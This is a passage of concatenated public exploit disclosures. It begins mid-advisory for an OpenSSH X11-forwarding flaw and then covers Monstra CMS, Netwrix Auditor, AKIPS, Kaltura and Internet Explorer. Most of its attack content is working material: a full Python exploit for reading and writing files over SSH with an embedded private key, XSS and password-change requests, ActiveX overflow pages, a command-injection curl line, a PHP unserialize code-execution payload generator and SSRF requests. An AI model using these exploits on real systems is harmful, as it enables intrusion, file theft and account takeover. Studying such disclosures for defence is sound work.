command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
#cat /etc/passwd
user2:x:1001:1002:,,,:/home/user2:/bin/false
2. run sshd with `X11Forwarding yes` (kali default config)
#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
3. `forced-commands` - connect with user1 and display env information
#> python <host> 22 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
INFO:__main__:connecting to: user1:<PKEY>@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file: /home/user1/.Xauthority
File new: no
File locked: no
Number of entries: 1
Changes honored: yes
Changes made: no
Current input: (stdin):3
/usr/bin/xauth: (stdin):2: bad "add" command line
...
4. `forced-commands` - read `/etc/passwd`
...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
5. `forced-commands` - write `/tmp/testfile`
#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line
#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
#> cat /tmp/testfile
\FA65500hi\FA65500`thisisatestfile`\AA
6. `/bin/false` - connect and read `/etc/passwd`
#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
user2:x:1001:1002:,,,:/home/user2:/bin/false
...
7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100
#> generate 8.8.8.8:100 .
#> tcpdump
IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
Mitigation / Workaround
------------------------
* disable x11-forwarding: `sshd_config` set `X11Forwarding no`
* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`
Notes
-----
Verified, resolved and released within a few days. very impressive.
Vendor response: see advisory [5]
References
----------
[1] http://www.openssh.com/
[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
[4] http://linux.die.net/man/1/xauth
[5] http://www.openssh.com/txt/x11fwd.adv
'''
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <github.com/tintinweb>
###############################################################################
#
# FOR DEMONSTRATION PURPOSES ONLY!
#
###############################################################################
import logging
import StringIO
import sys
import os
LOGGER = logging.getLogger(__name__)
try:
import paramiko
except ImportError, ie:
logging.exception(ie)
logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko")
sys.exit(1)
class SSHX11fwdExploit(object):
def __init__(self, hostname, username, password, port=22, timeout=0.5,
pkey=None, pkey_pass=None):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if pkey:
pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)
self.ssh.connect(hostname=hostname, port=port,
username=username, password=password,
timeout=timeout, banner_timeout=timeout,
look_for_keys=False, pkey=pkey)
def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"):
transport = self.ssh.get_transport()
session = transport.open_session()
LOGGER.debug("auth_cookie: %s"%repr(cmd))
session.request_x11(auth_cookie=cmd)
LOGGER.debug("dummy exec returned: %s"%session.exec_command(""))
transport.accept(0.5)
session.recv_exit_status() # block until exit code is ready
stdout, stderr = [],[]
while session.recv_ready():
stdout.append(session.recv(4096))
while session.recv_stderr_ready():
stderr.append(session.recv_stderr(4096))
session.close()
return ''.join(stdout)+''.join(stderr) # catch stdout, stderr
def exploit_fwd_readfile(self, path):
data = self.exploit("xxxx\nsource %s\n"%path)
if "unable to open file" in data:
raise IOError(data)
ret = []
for line in data.split('\n'):
st = line.split('unknown command "',1)
if len(st)==2:
ret.append(st[1].strip(' "'))
return '\n'.join(ret)
def exploit_fwd_write_(self, path, data):
'''
adds display with protocolname containing userdata. badchars=<space>
'''
dummy_dispname = "127.0.0.250:65500"
ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data))
if ret.count('bad "add" command line')>1:
raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data))
LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname)))
return path
demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
'''
PRIVKEY = """-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69
9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn
PLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN
zKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts
U68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh
TLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH
SBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W
s1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O
aDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne
euQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T
A7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA
rhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe
DDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj
bDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc
KPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9
2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY
nimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw
Gt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM
F0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f
W3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr
bjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/
nY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL
b4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX
Ao8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV
pryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv
-----END RSA PRIVATE KEY-----"""
if __name__=="__main__":
logging.basicConfig(loglevel=logging.DEBUG)
LOGGER.setLevel(logging.DEBUG)
if not len(sys.argv)>4:
print """ Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
"""
sys.exit(1)
hostname, port, username, password = sys.argv[1:]
port = int(port)
pkey = None
if os.path.isfile(password):
password = None
with open(password,'r') as f:
pkey = f.read()
elif password==".demoprivkey":
pkey = PRIVKEY
password = None
LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys)
LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "<PKEY>", hostname, port))
ex = SSHX11fwdExploit(hostname, port=port,
username=username, password=password,
pkey=pkey,
timeout=10
)
LOGGER.info("connected!")
LOGGER.info ("""
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
""")
while True:
cmd = raw_input("#> ").strip()
if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"):
break
elif cmd.lower().startswith(".info"):
LOGGER.info(ex.exploit("\ninfo"))
elif cmd.lower().startswith(".readfile"):
LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1]))
elif cmd.lower().startswith(".writefile"):
parts = cmd.split(" ")
LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))
else:
LOGGER.info(ex.exploit('\n%s'%cmd))
# just playing around
#print ex.exploit_fwd_readfile("/etc/passwd")
#print ex.exploit("\ninfo")
#print ex.exploit("\ngenerate <ip>:600<port> .") # generate <ip>:port port=port+6000
#print ex.exploit("\nlist")
#print ex.exploit("\nnlist")
#print ex.exploit('\nadd xx xx "\n')
#print ex.exploit('\ngenerate :0 . data "')
#print ex.exploit('\n?\n')
#print ex.exploit_fwd_readfile("/etc/passwd")
#print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`")
LOGGER.info("--quit--")
Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change
Google Dork: intext:"Powered by Monstra"/users/registration
Date: 2016-03-28
Exploit Author: Sarim Kiani
Vendor Homepage: http://monstra.org
Software Link: http://monstra.org/download
Version: 3.0.3
Tested on: Windows OS
==================== TIMELINE ====================
- Discovery Date: March 16 2016
- Disclosed to Vendor: March 22 2016
- Vendor Fixed the Issue: March 27 2016
==================================================
Bug Tracking ID: Github Issue # 405
Link: https://github.com/monstra-cms/monstra/issues/405
Application Description: Monstra is a modern light weighted Content Management System written in php.
1. Vulnerability Description:
Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.
Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users:
http://localhost/monstra-3.0.3/users/1
The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found.
Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'.
2. Proof of Concept/Code Flaw:
`In file monstra\plugins\box\users\users.plugin.php
Function: getProfileEdit
Line No: 233
if (Users::$users->update(Request::post('user_id'),
array('login' => Security::safeName(Request::post('login')),
'firstname' => Request::post('firstname'),
'lastname' => Request::post('lastname'),
'email' => Request::post('email'),
'skype' => Request::post('skype'),
'about_me' => Request::post('about_me'),
'twitter' => Request::post('twitter')))) {
// Change password
if (trim(Request::post('new_password')) != '') {
Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
}
Notification::set('success', __('Your changes have been saved.', 'users'));
Request::redirect(Site::url().'/users/'.$user['id']);
On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality
Users::$users->update --> updates the password`
Header:
> POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
Content-Length: 152
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/monstra-3.0.3/users/8/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B
csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save
3. Solution:
Vendor has resolved the issue, use the patch 'User Security Fix # 406'.
Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5
##################################################################################
#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS
#Google Dork: intext:"Powered by Monstra"
#Date: 2016-03-16
#Exploit Author: Sarim Kiani
#Vendor Homepage: http://monstra.org
#Software Link: http://monstra.org/download
#Version: 3.0.3
#Tested on: Windows OS
Monstra is a modern light weighted Content Management System written in php.
1. Description
A Persistent XSS exists in the "Edit Profile" page of the application.
2. Proof of Concept
Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.
Payload: "><script>alert(1);</script>
The following entries on the page are vulnerable to a Persistent XSS payload:
'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.
POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra-3.0.3/users/8/edit
Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 440
csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save
3.Solution
No newer (fixed) versions are currently available.
Netwrix Auditor 7.1.322.0 ActiveX (sourceFile) Stack Buffer Overflow Vulnerability
Vendor: Netwrix Corporation
Product web page: http://www.netwrix.com
Affected version: 7.1 (Build 322)
Summary: Netwrix Auditor is an IT audit software that maximizes visibility
of IT infrastructure changes and data access. The product provides actionable
audit data about who changed what, when and where and who has access to what.
Desc: The application suffers from a stack-based buffer overflow vulnerability
when parsing large amount of bytes to the 'sourceFile' string parameter in
PackFile() and UnpackFile() functions in 'Netwrix.Common.CollectEngine.dll'
library, resulting in stack overrun overwriting several registers including
the SEH chain. An attacker can gain access to the system of the affected node
and execute arbitrary code.
----------------------------------------------------------------------------
STATUS_STACK_BUFFER_OVERRUN encountered
(1fbc.1470): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=63d7e5b8 ecx=7693047c edx=0040db55 esi=00000000 edi=0072a4ac
eip=7693025d esp=0040dd9c ebp=0040de18 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
kernel32!GetProfileStringW+0x12cc1:
7693025d cc int 3
--
(1a98.1c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll
eax=00000041 ebx=000012b2 ecx=00350000 edx=00000020 esi=00762240 edi=0034dc7c
eip=5dd16895 esp=0034d75c ebp=0034d778 iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010213
Netwrix_Common_CollectEngine!DllUnregisterServer+0x21725:
5dd16895 668901 mov word ptr [ecx],ax ds:002b:00350000=????
0:000> !exchain
0034e51c: 00410041
Invalid exception stack at 00410041
----------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5311
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5311.php
07.12.2015
--
#1
<html>
<object classid='clsid:F45C10B1-AEB6-4D2C-BC17-97749DA1F908' id='acnid' />
<script language='VBScript'>
Target = "C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll"
Prototype = "Sub PackFile (ByVal sourceFile As String, ByVal packedFile As String)"
Member = "PackFile"
ID = "CollectEngineLib.FileCompress"
src = String(2000, "A")
packed = "exploit.zip"
acnid.PackFile src, packed
</script>
#2
<html>
<object classid='clsid:F45C10B1-AEB6-4D2C-BC17-97749DA1F908' id='anida' />
<script language='VBScript'>
Target = "C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll"
Prototype = "Sub UnpackFile (ByVal sourceFile As String, ByVal unpackedFile As String)"
Member = "UnpackFile"
ID = "CollectEngineLib.FileCompress"
src = String(900, "A") + "BB" + "CC" + String(105, "D") + String(100, "EE")
unpack = "exploit.zip"
anida.UnpackFile src, unpack
</script>
</html>
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
# Date: 03-14-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# WebPage: http://somethingbroken.com/
# Vendor Homepage: https://www.akips.com/
# Software Link: https://www.akips.com/showdoc/download
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
# Tested on: FreeBSD 10.2-RELEASE-p7
# CVE : N/A
1. Description
The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
By using concatenation '||' a command may be appended to the username.
The vendor has stated the following:
"Apparently the issue is in a Perl module which does an open2() of a
custom PAM program. The command is not being properly sanitised." - Vendor Reply
http://somethingbroken.com/vuln/0002.html
2. Proof of Concept
example request:
curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
example response:
<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
3. Solution:
Update to version 16.6
https://www.akips.com/showdoc/download
4. Timeline:
* 03-14-2016: Discovered, Vendor Notified, Vendor Response
* 03-15-2016: Vendor Releases Remediated Build 16.6
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Kaltura Community Edition Multiple Vulnerabilities
Affected versions: Kaltura Community Edition <=11.1.0-2
PDF:
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
+-----------+
|Description|
+-----------+
The Kaltura platform contains a number of vulnerabilities, allowing
unauthenticated users to execute code, read files, and access services
listening on the localhost interface. Vulnerabilities present in the
application also allow authenticated users to execute code by uploading
a file, and perform stored cross site scripting attacks from the Kaltura
Management Console into the admin console. Weak cryptographic secret
generation allows unauthenticated users to bruteforce password reset
tokens for accounts, and allows low level users to perform privilege
escalation attacks.
+------------+
|Exploitation|
+------------+
==Unserialize Code Execution==
The following PHP POC will generate an object that leads to code
execution when posted to an endpoint present on the server.
Authentication is not required.
[POC]
<?php
$init = "system('id;uname -a')";
$cmd = $init.".die()";
$len = strlen($cmd);
$obj="a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:$len:\"$cmd\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}";
$sploit = base64_encode($obj);
echo $sploit;
?>
------------
The Base64 encoded object generated above should be included in the
kdata section of the following curl request:
$curl
http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit]
==Arbitrary File Upload==
Users authenticated to the KMC with appropriate privileges can upload
arbitrary files through the "Upload Content" functionality. This can be
used to upload a PHP web shell as an image file and gain command
execution. In order to excute the code, the on-disk path of the uploaded
file must be obtained, and then browsed to directly. Obtaining the
uploaded file's path can be achieved with the following command.
[POC]
$curl
http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx
-b "[Valid Cookie]"
Directly accessing the path "url" returned by the above request will
result in the exceution of the uploaded php script.
$curl http://[HOST]/[URL PATH]
==SSRF / File Read (Limited)==
A limited number of files on the host can be read by passing a "file://"
protocol handler to a CURL call.
[POC]
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini
Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The
following POC uses the SSRF issue to send a command and retrieve
statistics from memcached listening on localhost, which is present in a
default Kaltura install.
[POC]
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
-m 2 --data $'b=set nl 0 60 4\n\n\n\n\n'
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
--data "c=get nl&d=stats&e=quit"
+----------+
| Solution |
+----------+
Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the
majority of these issues. No fixes are available for some of the issues
disclosed, so carefully firewalling off the Kaltura interface is
recommended.
+------------+
| Additional |
+------------+
A disclosure timeline, further information and additional less critical
vulnerabilities are available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=677
Minimized PoC:
-->
<style type="text/css">
*:before {
content:counter(counter-0) close-quote url(?);
column-count:1;
position:fixed;
}
</style>
<!--
Backtrace for reference:
2:051:x86> k
ChildEBP RetAddr
0c2c9688 60ca029e MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x6f2093
0c2c974c 60c9fe17 MSHTML!Layout::PageCollection::FormatPage+0x167
0c2c9854 60caad7e MSHTML!Layout::PageCollection::LayoutPagesCore+0x2c3
0c2c9880 60caac9f MSHTML!Layout::PageCollection::LayoutPages+0xca
0c2c9938 60caa49c MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x3b8
0c2c99c0 61295d6e MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xec
0c2c9a04 60c8c52f MSHTML!CView::EnsureSize+0x224
0c2c9a5c 610977ce MSHTML!CView::EnsureView+0x3a5
0c2c9b10 60dd92ab MSHTML!CDoc::RunningToInPlace+0x1b4
0c2c9b30 60dfaabe MSHTML!CServer::TransitionTo+0x50
0c2c9b48 62118e72 MSHTML!CServer::Show+0x50
0c2c9b68 62118d61 IEFRAME!CDocObjectHost::_ShowMsoView+0xd8
0c2c9b84 6109585d IEFRAME!CDocObjectHost::ActivateMe+0x31
0c2c9ba8 610957d1 MSHTML!CServer::ActivateView+0x81
0c2c9bd8 6109577b MSHTML!CServer::DoUIActivate+0x21
0c2c9c0c 60df9e59 MSHTML!CServer::DoVerb+0x77
0c2c9c4c 60df9e0e MSHTML!CMarkup::Navigate+0x3b
0c2c9c5c 62118f52 MSHTML!CDoc::Navigate+0x1e
0c2c9ca0 62273041 IEFRAME!CDocObjectHost::_ActivateMsoView+0x8f
0c2c9cc0 620b51c0 IEFRAME!CDocObjectHost::UIActivate+0x4c
0c2c9cd8 62272f7d IEFRAME!CDocObjectView::UIActivate+0x20
0c2c9d04 620dc130 IEFRAME!CBaseBrowser2::_UIActivateView+0xa5
0c2cbdd0 620e464c IEFRAME!CBaseBrowser2::v_ActivatePendingView+0x200
0c2cbdf0 620e01a4 IEFRAME!CShellBrowser2::v_ActivatePendingView+0x2c
0c2cbe0c 620e00c9 IEFRAME!CBaseBrowser2::_ExecShellDocView+0xcb
0c2cbe40 6209bf4c IEFRAME!CBaseBrowser2::Exec+0x20c
0c2cc0d0 620dafd5 IEFRAME!CShellBrowser2::Exec+0xdd
0c2cc108 620d9a4b IEFRAME!CDocObjectHost::_Navigate+0x50
0c2cc338 620da7f2 IEFRAME!CDocObjectHost::_OnReadyState+0x13c
0c2cc398 620da728 IEFRAME!CDocObjectHost::_OnChangedReadyState+0xc6
0c2cc3a0 60d9c704 IEFRAME!CDocObjectHost::OnChanged+0x1b
0c2cc3f0 60d82967 MSHTML!CBase::FirePropertyNotify+0x106
0c2cc414 60d8869c MSHTML!CMarkup::SetReadyState+0x85
0c2cc5b8 60d8d5ee MSHTML!CMarkup::SetInteractiveInternal+0x2bc
0c2cc5ec 60d8de5e MSHTML!CMarkup::RequestReadystateInteractive+0x92
0c2cc618 60d7cfea MSHTML!CMarkup::BlockScriptExecutionHelper+0xf7
0c2cc74c 60d83a78 MSHTML!CHtmPost::Exec+0xa1c
0c2cc76c 60d839de MSHTML!CHtmPost::Run+0x3d
0c2cc78c 60d8c2c3 MSHTML!PostManExecute+0x61
0c2cc7a0 60d8d0f8 MSHTML!PostManResume+0x7b
0c2cc7d0 60d4a45d MSHTML!CHtmPost::OnDwnChanCallback+0x38
0c2cc7e8 60c6d55b MSHTML!CDwnChan::OnMethodCall+0x2f
